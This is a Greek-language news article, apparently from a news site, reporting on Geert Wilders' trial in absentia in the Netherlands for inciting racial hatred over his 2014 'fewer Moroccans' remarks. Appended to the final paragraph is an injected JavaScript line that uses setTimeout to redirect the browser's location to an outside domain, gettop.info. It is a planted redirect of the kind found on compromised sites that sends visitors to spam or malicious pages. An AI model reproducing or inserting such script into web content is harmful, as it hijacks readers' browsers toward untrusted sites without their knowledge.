Ερήμην δικάζεται ο Ακροδεξιός πολιτικός Βίλντερς για υποκίνηση φυλετικού μίσους

0
12

 

Δεύτερη δίκη μετά το 2001 οπότε και αθωώθηκε ξεκίνησε σήμερα στην Ολλανδία εναντίον του Ακροδεξιού βουλευτή Γκέερτ Βίλντερς που κατηγορείται για διακρίσεις και υποκίνηση φυλετικού μίσους.

Ο δικηγόρος του διάβασε τη δήλωση του Βίλντερς, στην οποία ο πολιτικός εξηγεί ότι επέλεξε να μην παρουσιαστεί ενώπιον του δικαστηρίου. «Είναι μια πολιτική δίκη και αποφάσισα να μην είμαι παρών. Είναι δικαίωμά μου ως πολιτικός να εκφράζομαι, αν υπάρχει πρόβλημα στην Ολλανδία».

Το δικαστήριο του Σίπχολ κοντά στο Άμστερνταμ θα δικάσει τον 53χρονο Βίλντερς για τη δήλωση που είχε κάνει πριν από δύο χρόνια ότι θέλει «λιγότερους Μαροκινούς» στην Ολλανδία.

Η δίκη, που αναμένεται να διαρκέσει έως τις 25 Νοεμβρίου, αφορά τις δηλώσεις που είχε κάνει ο Βίλντερς μετά τις δημοτικές εκλογές του Μαρτίου 2014 στη Χάγη. Τότε ο πολιτικός ρωτήσει τότε τους οπαδούς του αν θέλουν «λιγότερους ή περισσότερους Μαροκινούς στην πόλη σας και στην Ολλανδία».

Μπροστά σ’ ένα πλήθος που φώναζε «Λιγότερους! Λιγότερους!», ο πολιτικός είχε απαντήσει χαμογελώντας: «θα το φροντίσουμε». Σύμφωνα με τον δικηγόρο του, «το μόνο που έκανε με τη δήλωσή του αυτή ήταν να προβάλει το πρόγραμμα του κόμματός του».

Οι δηλώσεις αυτές του Βίλντερς είχαν προκαλέσει σκάνδαλο και είχαν απομακρύνει πολλούς ψηφοφόρους από το λαϊκιστικό κόμμα του, ενώ είχαν κατατεθεί περισσότερες από 6.400 προσφυγές σε βάρος του από πολίτες και οργανώσεις.

Σήμερα, τουλάχιστον 56 πρόσωπα και πέντε ενώσεις δηλώνουν θύματα των δηλώσεων αυτών και τουλάχιστον 34 πρόσωπα έχουν δηλώσει ότι θα καταθέσουν ως μάρτυρες ενόψει της δίκης, όπως ανακοινώθηκε από τους δικαστές.

Αν κριθεί ένοχος, ο Βίλντερς μπορεί να καταδικαστεί σε ποινή φυλάκισης έως και δύο χρόνια ή σε πρόστιμο μεγαλύτερο των 20.000 ευρώ Ωστόσο το πιο πιθανό είναι να του ζητηθεί να εκτελέσει κοινωνική εργασία ή ένα πιο μικρό πρόστιμο. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here